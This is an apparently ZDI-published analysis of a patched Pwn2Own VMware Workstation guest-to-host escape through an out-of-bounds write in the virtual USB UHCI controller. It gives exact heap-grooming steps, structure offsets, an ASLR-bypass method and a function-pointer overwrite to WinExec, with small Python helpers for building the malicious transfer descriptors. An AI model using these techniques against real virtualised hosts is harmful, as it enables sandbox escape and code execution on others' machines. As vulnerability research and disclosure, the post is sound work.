Taking Control of VMware Through the Universal Host Controller Interface: Part 2

August 15, 2019 | Guest Blogger

This blog, which looks at a winning Pwn2Own entry, was provided by Abdulellah Alsaheel, our summer intern from Purdue University. It is the second blog reviewing this Pwn2Own-winning exploit. You can read the first part of this series here.


During this year’s Pwn2Own competition in Vancouver, the Fluoroacetate team demonstrated how they could escalate privileges by exploiting VMware Workstation to escape from the guest OS to the host OS. They exploited an out-of-bounds read/write vulnerability (ZDI-19-421) in the virtual USB 1.1 UHCI (Universal Host Controller Interface).

While this vulnerability affected a wide variety of VMware products, the analysis throughout this blog is based on VMware Workstation 15.0.3 using Fluoroacetate’s exploit. The vulnerability was patched in VMware Workstation 15.0.4 with VMSA-2019-0005.1.

The Vulnerability

To allow VMware guest machines to access USB devices, VMware installs a kernel device driver named uhci_hcd in the guest. “hcd” stands for “Host Controller Driver”. This driver allows the guest to communicate with the Host Controller Interface (HCI) on the host side, which is the hardware interface used by the host to communicate with the physical USB port. Communication is accomplished by sending or receiving USB Request Block (URB) packets to or from various endpoints defined by the USB device. Each endpoint of the USB device is intended either to receive packets from the host (OUT) or to send packets to the host (IN). The vulnerability is triggered by sending a specially crafted OUT packet to a certain endpoint known as the Bulk endpoint.

Packets handled by the uhci_hcd driver are represented in memory by the uhci_td (Transfer Descriptor) structure:

Transfer Descriptor (TD) structure

Note that the token field contains certain bit-aligned subfields not visible here. In particular, the lowest 8 bits indicate the “Packet ID”, which defines the type of packet. The top 11 bits (bits 21 through 31) form a length field named MaxLen.
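As a rough illustration of these subfields, the following Python sketch unpacks a token value. The bit positions (Packet ID in bits 0 through 7, MaxLen in bits 21 through 31) are the ones used in this post; the helper name decode_token is ours and does not come from the exploit or from VMware.

```python
PID_MASK = 0xFF       # bits 0-7: Packet ID
MAXLEN_SHIFT = 21     # bits 21-31: MaxLen
MAXLEN_MASK = 0x7FF   # 11-bit field


def decode_token(token: int) -> dict:
    """Split a 32-bit TD token into the two subfields discussed here.

    Hypothetical helper for illustration; other token subfields
    (device address, endpoint, data toggle) are ignored.
    """
    return {
        "pid": token & PID_MASK,
        "maxlen": (token >> MAXLEN_SHIFT) & MAXLEN_MASK,
    }


# Example: an OUT packet (0xE1) whose MaxLen subfield holds 0x40.
fields = decode_token((0x40 << MAXLEN_SHIFT) | 0xE1)
print(hex(fields["pid"]), hex(fields["maxlen"]))
```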

To trigger this vulnerability, the guest must send a crafted TD structure that sets the Packet ID to OUT (0xE1). Additionally, the TD’s buffer length, indicated by the MaxLen subfield, has to be more than 0x40 bytes to overflow an object on the heap. By attaching WinDbg to vmware-vmx.exe and triggering the vulnerability, we get the following access violation:

The call stack reveals a chain of functions that handle UHCI requests:

The memcpy call that crashes the process was in the middle of copying data from the TD’s buffer:

And this is what memcpy has copied from the TD’s buffer to the heap:

Let’s see what the destination buffer size is:

The size of the buffer is 0x58 because vmware-vmx allocates the destination buffer with the size [number_of_TD_structures]*0x40+0x18. Since this time we only sent one TD structure, the buffer size is 1*0x40+0x18=0x58 bytes.
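The allocation formula is simple enough to check by hand, but a small sketch makes the sizes used later in this post easy to reproduce. The constant and function names below are ours, chosen for illustration only.

```python
TD_SLOT_SIZE = 0x40  # bytes reserved per TD structure, per the formula above
HEADER_SIZE = 0x18   # fixed buffer header


def dest_buffer_size(num_tds: int) -> int:
    """Size of the heap buffer allocated for a request of num_tds TDs."""
    if num_tds < 1:
        raise ValueError("at least one TD is required")
    return num_tds * TD_SLOT_SIZE + HEADER_SIZE


# One TD gives the 0x58-byte buffer seen in the debugger;
# five TDs give the 0x158-byte buffer the exploit relies on.
for n in (1, 5):
    print(n, hex(dest_buffer_size(n)))
```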

In this memcpy call, we can precisely control how many bytes are copied. To do this, we set the MaxLen subfield in the OUT TD’s token field (bits 21 through 31) to the desired memcpy size minus one.
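A minimal sketch of that encoding follows. It only fills in the Packet ID and MaxLen subfields and leaves the rest of the token at zero, which is a simplification; the function name out_token is hypothetical.

```python
USB_PID_OUT = 0xE1
MAXLEN_SHIFT = 21
MAXLEN_LIMIT = 0x7FE  # 0x7FF is reserved by UHCI for a zero-length packet


def out_token(copy_size: int) -> int:
    """Build an OUT token whose MaxLen requests a copy of copy_size bytes.

    Only checks that the value fits the 11-bit field; which lengths the
    virtual controller actually accepts is not modelled here.
    """
    maxlen = copy_size - 1
    if not 0 <= maxlen <= MAXLEN_LIMIT:
        raise ValueError("copy size does not fit the MaxLen subfield")
    return (maxlen << MAXLEN_SHIFT) | USB_PID_OUT


# A 0x41-byte copy is the smallest one that exceeds a single 0x40-byte TD slot.
print(hex(out_token(0x41)))
```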

Clearly, this lets us overflow the heap. However, the exploit author was also able to use this vulnerability to perform additional out-of-bounds writes. The function NewURB() (located at vmware_vmx+0x165710) gets called to handle incoming URB packets. Each time NewURB() receives a TD, it advances a variable known as cursor by the TD’s length (MaxLen plus one). The cursor variable points to where the function should write next when it receives a TD structure. In this way, the MaxLen field can be used to partially control the destination address when processing subsequent TDs.

The Exploit

In order to exploit this vulnerability, it’s necessary to prepare the layout of the heap of the vmware-vmx process. To perform the heap preparation tasks, the exploit mainly relies on the SVGA3D protocol on the front end (the guest side), which it uses to communicate with the host through the SVGA FIFO. On the back end (the host side), VMware handles the requests using the DX11Renderer component. The exploit code starts with an initialization phase, where it initializes the SVGA FIFO memory and then allocates the SVGA3D object tables. It looks like Amat based the exploit primitives used here on research presented by Zisis Sialveras at Black Hat Europe 2018 [PDF].

The overall strategy for preparing the heap is as follows. The exploit tries to create “holes”, or islands of unallocated memory, each 0x158 bytes in size. That is exactly the size required to allocate a certain number of TDs together with a buffer header. The TDs will likely be allocated within one of these holes. Following each hole, the exploit tries to place a 0x150-byte structure called a “resource container”, representing data associated with a graphics surface. The plan is to corrupt the resource container that immediately follows the allocated TDs.

The exploit code prepares the heap using the following steps:
    -- Define and bind a Context memory object with a size of 0x5000.
    -- Define a memory object (SPRAY_OBJ) with the size 0x1000, that the exploit repeatedly uses to bind with structures (e.g., shaders).
    -- Define 2400 shaders with the size 0x158, binding them to SPRAY_OBJ. After that, the exploit uses SVGA_3D_CMD_SET_SHADER to spray the shaders in the host.
    -- Iterate through the sprayed shaders and perform the following:
        --- Deallocate each even-numbered shader.
        --- Create a surface, to allocate a resource container having a size of 0x150. This allocation will usually be made in the hole that was just vacated by a shader. Additionally, the host will allocate an associated data buffer of size 0x160. Because of the difference in size, these data buffers will be located in a separate area of the Low-Fragmentation Heap (LFH). Each 0x150-byte resource container will contain a pointer to its associated 0x160-byte data buffer.
        --- Create two more surfaces, to allocate two other resource containers having a size of 0x160. Because of their size, the resource containers allocated in this step will be located in memory near the 0x160-byte data buffers of the previous step. For this reason, these resource containers are known as the “adjacent” resource containers. The purpose of these “adjacent” resource containers will be explained below.
    -- Deallocate all remaining shaders, to free blocks of size 0x158. These holes of size 0x158 will alternate with the resource containers of size 0x150.
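To visualize the intended result of these steps, here is a deliberately idealized model. It treats the relevant heap region as a flat list of equally sized slots and assumes every surface allocation lands in the hole that was just freed. The real Low-Fragmentation Heap gives no such guarantee, which is why the exploit sprays thousands of objects and retries. All names here are ours.

```python
def model_heap_layout(num_shaders: int = 2400) -> list:
    """Toy model of the spray: returns the final state of each slot."""
    # Spray: every slot holds a 0x158-byte shader.
    slots = ["shader"] * num_shaders

    # Free each even-numbered shader and (ideally) reuse the hole
    # for a 0x150-byte resource container.
    for i in range(0, num_shaders, 2):
        slots[i] = "hole"
        slots[i] = "container"

    # Free all remaining shaders, leaving 0x158-byte holes behind.
    return ["hole" if s == "shader" else s for s in slots]


layout = model_heap_layout()
print(layout[:4])
print(layout.count("hole"), layout.count("container"))
```

In this model every hole except the last one is directly followed by a resource container, which is the arrangement the TD allocation needs.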

Out-of-Bounds Write Function

Before we highlight the general structure of the exploit, let’s describe the function WriteOOB that triggers the vulnerability. WriteOOB is called many times throughout the exploit for different purposes, such as leaking the vmware-vmx.exe and kernel32.dll base addresses, as well as the final code execution step. The function’s parameters are as follows:

WriteOOB(void * data, size_t data_size, uint32_t offset)

The data parameter is a pointer to a buffer containing data we intend to write to the host heap. The data_size parameter specifies the length of the data. Finally, the offset parameter specifies the location where we want to write the data, relative to the start of the resource container that will be corrupted.

The function first allocates and initializes the frame list and five TD structures. Recall that during heap massaging, we create holes of size 0x158. This function sends five TD structures, so the allocated buffer size on the heap will be 5*0x40+0x18=0x158. The hope is that this allocation will be made in the hole, so that immediately following the TDs there will be a resource container to corrupt.

Each TD structure is linked to the next TD structure using the link field, except for the last TD structure, which is a terminating TD structure. For the first three TD structures, the MaxLen subfield is set to 0x40. The Packet ID subfield for the first three TD structures is set to USB_PID_SOF, so that the cursor will advance by 0x41 for each TD structure. The Packet ID for the fourth TD structure is also set to USB_PID_SOF, but for this TD, MaxLen is set to a value calculated from the offset parameter. This advances the cursor by a controllable amount. In the fifth TD, the Packet ID is set to USB_PID_OUT, in order to write the content of the data buffer to the cursor position.
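The five-TD chain can be sketched as a list of (Packet ID, MaxLen) pairs. This is our reconstruction, not the exploit's code: it assumes the cursor advances by MaxLen plus one for every TD, as the 0x40 to 0x41 relationship above suggests, and that the fourth TD simply absorbs whatever distance remains. The parameter cursor_target (total bytes the cursor must move before the write) and the function name are hypothetical.

```python
USB_PID_SOF = 0xA5
USB_PID_OUT = 0xE1
PADDING_MAXLEN = 0x40  # MaxLen used by the first three TDs


def plan_td_chain(cursor_target: int, data_size: int) -> list:
    """Return (pid, maxlen) pairs for the five TDs of one write."""
    padding_advance = 3 * (PADDING_MAXLEN + 1)       # 3 * 0x41
    fourth_advance = cursor_target - padding_advance
    if not 1 <= fourth_advance <= 0x7FF:
        raise ValueError("target not reachable with one adjusting TD")
    if not 1 <= data_size <= 0x7FF:
        raise ValueError("data size does not fit the MaxLen subfield")
    return [
        (USB_PID_SOF, PADDING_MAXLEN),
        (USB_PID_SOF, PADDING_MAXLEN),
        (USB_PID_SOF, PADDING_MAXLEN),
        (USB_PID_SOF, fourth_advance - 1),   # controllable cursor advance
        (USB_PID_OUT, data_size - 1),        # the actual out-of-bounds write
    ]


# Move the cursor 0x280 bytes, then write a single byte.
for pid, maxlen in plan_td_chain(0x280, 1):
    print(hex(pid), hex(maxlen))
```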

Memory leak and bypassing ASLR

Now that the exploit primitives are all in place, the first order of business is to leak the base address of vmware-vmx.exe. This is done by corrupting the pointer to the data buffer in the resource container immediately following the TDs. This pointer resides at offset 0x138 within the resource container. The exploit corrupts the least significant byte of the data pointer by replacing it with 0x00. When the corrupted pointer gets referenced, it no longer points to the data buffer. Instead, it points within one of the 0x160-byte “adjacent” resource containers that are located close to the data buffers. Within these resource containers there are some function pointers, so when the data is copied back to the guest, the vmware-vmx.exe base address is revealed:

Let’s see how many bytes we need to move the cursor in order to patch the data pointer precisely:

    -- Initially, the cursor points to the beginning of a buffer with size 0x158, and considering that the first 0x18 bytes are reserved as a buffer header, we only have control over 0x140 bytes.
    -- 0x8 bytes are taken up by the heap block header of the following resource container.
    -- The offset to the data pointer in the resource container is 0x138.

This sums to 0x140+0x8+0x138=0x280, and this is the number of bytes the cursor has to move to point to the byte we intend to patch.
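The same arithmetic generalizes to any offset inside the resource container. The sketch below restates it with named constants; the names are ours, and the 0x8-byte heap block header is the value given above for this particular heap configuration.

```python
TD_AREA_SIZE = 5 * 0x40   # 0x140 controllable bytes after the 0x18 header
HEAP_BLOCK_HEADER = 0x8   # header of the following resource container
DATA_PTR_OFFSET = 0x138   # data pointer inside the resource container


def cursor_distance(offset_in_container: int) -> int:
    """Bytes the cursor must advance to reach a resource container offset."""
    if offset_in_container < 0:
        raise ValueError("offset must be non-negative")
    return TD_AREA_SIZE + HEAP_BLOCK_HEADER + offset_in_container


print(hex(cursor_distance(DATA_PTR_OFFSET)))  # prints 0x280
```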

In order to write back the leaked function pointers to the guest, the exploit iterates over the 2400 sprayed surfaces and obtains the data from each one using SVGA_3D_CMD_SURFACE_COPY. It continues iterating until it finds the leaked function pointers that reveal the vmware-vmx.exe base address.

To find the kernel32.dll base address, the exploit follows the same process and offsets used to find vmware-vmx.exe, except for one minor detail. Instead of patching a single byte of the pointer, it overwrites the entire data pointer with vmware_vmx_base_address+0x7D42D8, which is where the address of Kernel32!MultiByteToWideCharStub is stored in the import address table. This reveals the kernel32.dll base address.
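Turning a leaked pointer into a module base is a subtraction followed by a sanity check. In the sketch below, the import table slot offset 0x7D42D8 is the one quoted above for Workstation 15.0.3; the example base address and symbol RVA are made-up placeholder values, and the function names are ours.

```python
IAT_SLOT_RVA = 0x7D42D8  # slot holding kernel32!MultiByteToWideCharStub


def iat_slot_address(vmx_base: int) -> int:
    """Address written over the data pointer to leak the import entry."""
    return vmx_base + IAT_SLOT_RVA


def module_base(leaked_ptr: int, symbol_rva: int) -> int:
    """Recover a module base from a leaked pointer to a known symbol."""
    base = leaked_ptr - symbol_rva
    # Windows maps modules on 64 KiB boundaries, so a misaligned result
    # means the pointer or the assumed RVA is wrong.
    if base <= 0 or base & 0xFFFF:
        raise ValueError("result is not a plausible module base")
    return base


# Placeholder values for illustration only.
EXAMPLE_VMX_BASE = 0x7FF712340000
EXAMPLE_SYMBOL_RVA = 0x1A2B0

leaked = EXAMPLE_VMX_BASE + EXAMPLE_SYMBOL_RVA
print(hex(module_base(leaked, EXAMPLE_SYMBOL_RVA)))
print(hex(iat_slot_address(EXAMPLE_VMX_BASE)))
```

The alignment check is also a cheap way to reject stale surface data while iterating over the sprayed surfaces.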

Escape and Code Execution on the Host

To achieve code execution, the exploit once again overwrites a resource container on the heap. This time, the exploit overwrites 0x120 bytes of the resource container. This accomplishes three things:

      1 - It writes the string calc.exe to the resource container.
      2 - It fills out certain necessary fields of the resource container.
      3 - It overwrites a function pointer at offset 0x120 in the resource container, so that it instead points to kernel32!WinExec.

This is what the resource container looks like after corruption:

The result is that when the guest calls SVGA_3D_CMD_SURFACE_COPY on this corrupted resource container, the WinExec function pointer will get called, passing the address of the calc.exe string as the first parameter. The exploit must iterate through all 2400 surfaces to ensure that the corrupted resource container is used.

Summary of the exploit

To review the above material, we can summarize the exploit as follows:

    -- Heap massaging:
        --- Allocate 2400 shaders of size 0x158.
        --- Deallocate alternate shaders of size 0x158.
        --- For each deallocated shader, fill the hole with a resource container (e.g., surface) of size 0x150. Within this resource container there will be a pointer to an associated data buffer of size 0x160. Also create two more surfaces, allocating two resource containers of size 0x160 that will be adjacent to the data buffers.
    -- Leaking vmware-vmx.exe base address (iterate 64 times until the address is found):
        --- Call WriteOOB to corrupt a resource container of size 0x150 and patch the least significant byte of the pointer to its data buffer, so that it instead points to an adjacent 0x160-byte resource container. This memory contains some function pointers.
        --- Iterate through the 2400 surfaces and write the data back to the guest using SVGA_3D_CMD_SURFACE_COPY until leaked pointers are found.
    -- Leaking kernel32.dll base address (iterate 64 times until the address is found):
        --- Call WriteOOB to corrupt a resource container of size 0x150 and patch the pointer to its data buffer with the address of a kernel32.dll function in the import table of vmware-vmx.exe.
        --- Iterate through the 2400 surfaces and write the data back to the guest using SVGA_3D_CMD_SURFACE_COPY until the leaked pointer is found.
    -- Escape from the guest and gain code execution (iterate 64 times, until we have execution):
        --- Call WriteOOB to corrupt a resource container of size 0x150. Write the “calc.exe” string and patch a function pointer with the address of kernel32!WinExec.
        --- Trigger WinExec by iterating through the 2400 surfaces and writing them back to the guest using SVGA_3D_CMD_SURFACE_COPY.

Conclusion

VMware guest-to-host escapes can be performed reliably for certain memory corruption bugs. An exploit can gain code execution by adopting a semi-brute-force approach. It is still a challenge to find exploitable bugs in VMware, but once a vulnerability is found, it is not overly difficult to exploit. VMware SVGA provides a wide variety of operations and objects, such as resource containers and shaders. These are useful from an exploit perspective because of their adjustable size and the data and function pointers they store.

You can find me on Twitter at @0xAlsaheel and follow the ZDI team for the latest in exploit techniques and security patches.